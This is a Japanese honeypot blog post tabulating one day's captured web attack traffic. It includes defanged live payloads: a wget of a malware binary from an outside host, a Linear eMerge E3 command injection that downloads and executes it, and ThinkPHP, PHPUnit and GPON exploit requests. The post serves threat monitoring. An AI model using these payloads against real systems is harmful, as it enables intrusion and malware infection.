23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(324日目)

2020/02/04(火)

トータルは4110件でした。

ハンティングログは以下です。

94.89.40[.]90 wget hxxp[:]//switchnets.net/hoho.arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
4023 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
41 アクセス GET /
9 調査 GET /is_test
6 Wordpress管理画面の調査 GET /wp-admin/
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 PHPUnit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 調査 GET /script
1 WordPressのPingback機能を利用した通信 POST /xmlrpc.php
1 WordPressのPingback機能を利用した通信 POST /blog/xmlrpc.php
1 GPONルーター脆弱性を狙った通信 POST /GponForm/diag_Form?images/
1 不正中継の調査 GET hxxp[:]//httpbin.org/get?show_env=1&t=1580818072835298011
1 調査 GET /version
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 クローリング GET /robots.txt
1 調査 GET /logs
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 アクセス GET /favicon.ico
1 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 不正中継の試み CONNECT httpbin.org:443